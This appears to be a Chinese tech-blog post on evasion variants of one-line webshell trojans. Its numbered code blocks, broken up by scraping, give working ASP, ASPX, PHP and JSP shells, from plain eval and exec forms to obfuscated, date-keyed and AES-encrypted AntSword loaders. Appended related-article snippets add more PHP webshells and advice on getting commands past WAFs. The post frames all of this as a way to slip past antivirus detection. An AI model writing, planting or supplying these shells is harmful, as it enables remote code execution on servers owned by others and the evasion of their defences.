一句话木马各种变形

最新推荐文章于 2025-05-09 20:22:28 发布
最新推荐文章于 2025-05-09 20:22:28 发布
阅读量1.9k 收藏 2
点赞数 3
分类专栏: 网络安全
原文链接:https://blog.youkuaiyun.com/sunjikui1255326447/article/details/95756961
版权

0x00:简介

        一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。

0x01:叙事

一、常见的一句话


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:<%
     
     eval request("pass")%>
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASPX:<%@ Page Language=
     
     "Jscript"%><%Response.Write(eval(Request.Item[
     
     "z"],
     
     "unsafe"));%>
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:<?
     
     php eval(@$_POST['a']); ?>
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:<%Runtime.getRuntime().exec(request.getParameter(
     
     "i"));%>
     
     //无回显示执行系统命令

二、简单变形


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:<%
     
     eval
     
     ""&(
     
     "e"&
     
     "v"&
     
     "a"&
     
     "l"&
     
     "("&
     
     "r"&
     
     "e"&
     
     "q"&
     
     "u"&
     
     "e"&
     
     "s"&
     
     "t"&
     
     "("&
     
     "0"&
     
     "-"&
     
     "2"&
     
     "-"&
     
     "5"&
     
     ")"&
     
     ")")%>
     
     //-7
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASPX:<%@ Page Language = Jscript %>
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <%
     
     var
     
     /*-/*-*/P
     
     /*-/*-*/=
     
     /*-/*-*/
     
     "e"+
     
     "v"+
     
     /*-/*-*/
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     "a"+
     
     "l"+
     
     "("+
     
     "R"+
     
     "e"+
     
     /*-/*-*/
     
     "q"+
     
     "u"+
     
     "e"
     
     /*-/*-*/+
     
     "s"+
     
     "t"+
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ","+
     
     "\""+
     
     "u"+
     
     "n"+
     
     "s"
     
     /*-/*-*/+
     
     "a"+
     
     "f"+
     
     "e"+
     
     "\""+
     
     ")";
     
     eval
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     (
     
     /*-/*-*/P
     
     /*-/*-*/,
     
     /*-/*-*/
     
     "u"+
     
     "n"+
     
     "s"
     
     /*-/*-*/+
     
     "a"+
     
     "f"+
     
     "e"
     
     /*-/*-*/);%>
     
     //-7
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:
     
     <?php $_GET[a]($_GET[b]);
     
     ?>
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:<%
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     if(request.getParameter(
     
     "f")!=
     
     null)(
     
     new 
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     java.io.FileOutputStream(application.getRealPath(
     
     "\\")+request.getParameter(
     
     "f"))).write(request.getParameter(
     
     "t").getBytes());
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     %>

三、二次变形


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:
     
     <%if request ("MH")<>""then session("MH")=request("MH"):end 
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     if:
     
     if session(
     
     "MH")<>
     
     "" 
     
     then 
     
     execute session(
     
     "MH")%>
     
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASPX:
     
     <%@ Page 
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Language=
     
     "Jscript"%>
     
     
     
     <%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36",
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
     
     "MD5").ToUpper()],
     
     "unsafe");%>
     
     //随日期变化的连接密码
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:
     
     <?php ($_=@$_GET[2]).@$_($_POST[1])?>
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:
     
     <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>

四、三次变形


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:
     
     <%@Page Language="C#" %>
     
     
     
     <%@Import namespace="System.Reflection"%>
     
     
     
     <%if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
     
     //蚁剑中的一句话
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:
     
     <?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&call_user_func($b[0],$b[1]);?>//蚁剑中的一句话
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:
     
     <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
     
     
     
     <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
     
     
     
     <%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
     
     //蚁剑中的一句话

五、四次变形

  1、利用随机异或无限免杀d盾蚁剑版:

项目地址:https://github.com/yzddmr6/as_webshell_venom

   2、利用动态二进制加密实现新型一句话木马:

文章地址:https://xz.aliyun.com/t/2799

0x02:后话

    一句话木马变形有很多种方式,文中举例只是其中几种方式。千奇百怪的变形,不断的变化,都是为了躲避杀软的检测。杀软也在不断的更新规则库。两者都是在博弈中不断的强大。

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.youkuaiyun.com/sunjikui1255326447/article/details/95756961
PHP句话木马变形
weixin_40195907的博客
11-25 2792
PHP的句话木马 @ 表示忽略报错 $_POST 表示使用post的方式提交变量 attack代表为变量名 <?php @eval($_POST['attack'])?> 上传木马使用实例:
php简短句话木马免杀,免杀/句话木马(PHP)
weixin_39598568的博客
03-13 2738
前言在打CTF或渗透时,经常会遇到waf,普通的句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握句话木马的免杀。Webshell检测方式网上有很多免杀的句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下个payload。因此在此之前,先来了解下都有哪些检测方式。日志检测使用Web...
句话木马的各种变形
司徒荆的博客
07-13 2682
句话木马的各种变形
中国(AntSword)详解:功能、用途与句话木马代码剖析
最新发布
2201_75445650的博客
05-09 1548
中国(AntSword)是款开源、跨平台的 WebShell 管理工具,支持 PHP、ASP、ASPX、JSP 等常见脚本语言。它是渗透测试人员和安全研究员常用的 Web 持久化控制平台之,主要用于管理目标服务器上的 WebShell,实现文件管理、命令执行、数据库操作等功能。开源地址平台支持主要特点1.图形化界面,操作简便2.支持多种语言 WebShell3.插件系统丰富,可拓展免杀、信息收集、内网渗透等功能支持自定义 Shell 编码(UTF-8、GBK 等)
变形句话木马
时光凉春衫薄的博客
10-14 1704
变形句话木马 下图是个解析的东西:这是个句话木马变形通过异或运算来规避所有的敏感函数。。。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?&gt...
句话木马变形(编码)
buffedon的博客
12-20 983
句话木马变形(编码) 注意:如果全文只是加密的密文的话,那么就相当于是个字符串,在解析的时候不符合语义,依然不会检测出来 base64 编码 php <?php $c = base64_decode('YXNzZXJ0'); $c($_POST['pwd']); ?> java语言 <%@ Page Language="Jscript" Debug=true%> <% var a=Request.Form("mr6"); var res=System.Text.Encod
php句话木马变形技巧
小司机的奥拓
12-25 2015
更换执行数据来源字符替换或者编码采取隐匿手段tips:使用句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。
句话木马
apple_54886810的博客
09-21 1031
句话木马 什么是句话木马 句话木马就是只需要行代码的木马,短短行代码,就能做到和大马相当的功能。为了绕过waf的检测,句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 waf(Web Application Firewall):主要功能是拦截入侵尝试,比如SQL Injection, XSS, 路径遍历, 窃取敏感数据,CC攻击等。 常见分类: 1.单机WAF,比如Modsecurity,需要在每台目标服务器上部署; 2.自建WAF,较多的是Agent + 云管
php中fputs写入句话,phpmyadmin写入句话木马的测试
weixin_42525387的博客
03-11 1049
方法句话木马偶尔拿到个config中,发现是root,且还有phpmyadmin。好吧,试试select''INTOOUTFILE'E:\Web\wp-content\errors.php'提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题接着尝试:select''INTOOUTFILE'E:\\Web\\xxx.xx.vn\\wp-content\\error...
webshell之句话木马变形
weixin_30371875的博客
05-05 1590
什么是句话木马 句话木马就是只需要行代码的木马,短短行代码,就能做到和大马相当的功能。为了绕过waf的检测,句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向个网站提交数据,句话木马用 $_GET[' ']、$_POST[' ']、$_COO...
句话木马的多种写法
huike008的博客
06-05 480
asp句话 以下是引用片段: php句话 以下是引用片段: aspx句话 以下是引用片段: 可以躲过雷客图的句话。 以下是引用片段: 不用''的asp句话 以下是引用片段: 不用双引号的句话。 以下是引用片段: 句话 用批处理自动切换IP地址的方法 Server Application Error的解决方法 ...
关于PHP句话木马变形的研究
代码简单说 Vue、JAVA、PHP、Node.js 熟练运用,接口、架构、性能全搞定。
11-03 1195
本文将带你探黑客如何利用这些神秘代码突破网站的层层防护,掌控服务器,让我们揭开PHP句话木马变形背后的暗黑技术。例如,禁用不必要的函数(如 eval()、assert()),启用代码审查工具进行检测,结合动态分析与行为分析,提升检测的准确度。同时,增强网站访问控制,防止上传木马文件,也能降低被植入恶意代码的风险。攻击者传递的参数将被解码并执行,绕过静态检测,只有在实际执行时才能被识别,这也使得入侵行为更加难以察觉。这种形式掩盖了 eval() 的使用,达到同样的效果,使得安全策略更难防御。
句话木马变形
qq_45751902的博客
10-25 2009
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有个功能——可执行命令。使用方法:先用浏览器访问,生成新的文件"hello.php",再连接"hello.php"。这里是base64解密函数,"YXNzZXJ0"是assert的base64加密。第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。,按照PHP的格式,表达式在两个“/”之间。把用户传递的数据生成个函数fun(),然后再执行fun()。利用函数生成文件,第个参数是文件名,第二个参数是文件的内容。
科迅免杀php句话_PHP句话木马Webshell变形免杀总结
weixin_39721370的博客
12-21 398
0×00 前言大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了些小的方法,各种不足之前还请看官拍砖.0×01 字符串上的舞蹈般标准的句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下:@eval ($_POST[xxxxx]);很明显的eva...
句话木马的多种变形方式
金霖海的博客
10-14 1647
句话的混淆方式还有很多很多,基于以上的变形思路还能够衍生出无数新的变种木马,为了更好地防止“被放马”的事件发生,我们应该及时对使用的安全产品进行更新,才能让“马”无处可走。
PHP句话木马Webshell变形免杀总结
weixin_30559481的博客
11-20 1725
0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了些小的方法,各种不足之前还请看官拍砖. 0×01 字符串上的舞蹈 般标准的句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下: @eval ($_POS...
ASP+PHP+ASP.NET+JSP各种变形句话大集结
harryxlb的专栏
07-02 2764
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我声老大'}; lcx.性别((lcx.名字)+''); %> 用冰狐就行了 @preg_replace("/[email]/e",$_POST['h'],"error");  ?>  菜刀附加数据:  h=@ev
句话木马大全
2301_76786857的博客
06-14 7812
在很多的渗透过程中,渗透人员会上传句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,其基本原理是利用文件上传漏洞,往目标网站中上传句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']表示从页面中获得attack这个参数值。
史上最全句话木马
hackzkaq的博客
06-29 8023
目录 PHP //可执行命令句话 PHP系列 过狗句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 句话 ASP过安全狗句话 ASPX系列 ASPX句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
中国句话木马连接为空
04-03
### 句话木马连接为空的原因分析 在尝试通过连接句话木马的过程中,如果遇到连接为空的情况,可能涉及以下几个方面的问题: #### 图片文件中的代码丢失 当将含有恶意脚本的图片上传到服务器时,浏览器可能会自动解析并渲染图像内容。这种行为可能导致嵌入的恶意代码被移除或忽略[^1]。因此,在实际操作中,即使成功上传了带有隐藏代码的图片,最终的结果可能是无法正常运行预期的功能。 #### 新下载资源测试失败 即便更换不同的素材(例如重新获取张网络上的卡通马图),仍然面临相同困境——即无论怎样调整参数设置或者改变载体形式,都无法建立有效的反向shell会话链接[^2]。这表明问题根源并非单纯依赖于特定类型的载荷本身,而是更深层次的安全机制阻止了非法指令序列被执行。 #### 关于`eval()`函数的应用场景说明 值得注意的是,尽管PHP内置有能够动态解释字符串表达式的工具如`eval()`方法可以用来实现远程命令注入漏洞利用模式;但是由于其特殊性质决定了它并不适合采用间接方式调用(比如借助变量名映射来代替直接书写语法结构)[^3] 。所以对于某些防护措施较为完善的环境来说,仅仅依靠简单的GET请求传递未经验证处理过的数据包很难突破防线完成整个攻击链路构建过程。 --- ### 针对抗御策略的技术改进建议 为了克服上述提到的各种障碍因素从而达成目标效果,可以从下面几个角度出发考虑解决方案: #### 数据编码转换技巧 考虑到传输过程中可能出现的数据篡改编辑情况, 可以先对自己准备好的payload做层base64加密后再传送给服务端等待解密恢复原貌之后再交给 `eval()` 去评估运算. ```php <?php $code = base64_decode($_POST['code']); @eval($code); ?> ``` 这样做的好处在于增加了额外的层保护屏障使得常规手段难以轻易察觉其中暗藏玄机的同时也提高了兼容性和稳定性. #### 绕过WAF检测逻辑 现代Web应用防火墙(WAFs)通常会对常见的危险字符组合实施严格过滤审查制度以防SQL Injection/XSS等问题发生. 如果发现标准格式写法总是触发告警拦截的话,则有必要研究下具体规则定义然后针对性修改我们的构造样式使之看起来更加无害自然些。 举个例子说吧,原本打算发送这样的post body过去:`<?php system('whoami');?>`, 结果老是报错提示存在潜在威胁风险不予放行。那么此时不妨换个思路试试看能否达到同样目的却又不会引起怀疑: ```php ${'GLOBAl'}[..]=..;@assERt(${..}[]); // 或者 preg_replace('/(.*)/e',$_POST['cmd'],null); ``` 这些变形后的版本往往能有效规避初级形态下的特征匹配算法识别范畴进而顺利抵达目的地发挥效用。 #### 利用其他扩展特性替代传统做法 除了常用的exec(), shell_exec(), passthru()以及proc_open()之外还有很多鲜为人知却功能强大的库模块可供选用。比如说com_dotnet extension允许我们在windows平台下调用COM对象执行各种复杂任务而无需担心权限不足带来的困扰; 又或者是expect extension支持模拟交互式对话流程非常适合用于自动化部署配置等工作场合等等... --- ### 总结陈词 综上所述,针对句话木马连接为空这现象给出了多方面的探讨剖析,并提出了若干可行性的优化改进方向供大家参考借鉴。当然啦,以上内容仅限于技术交流学习用途,请务必遵守法律法规合理合规地运用所学知识!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值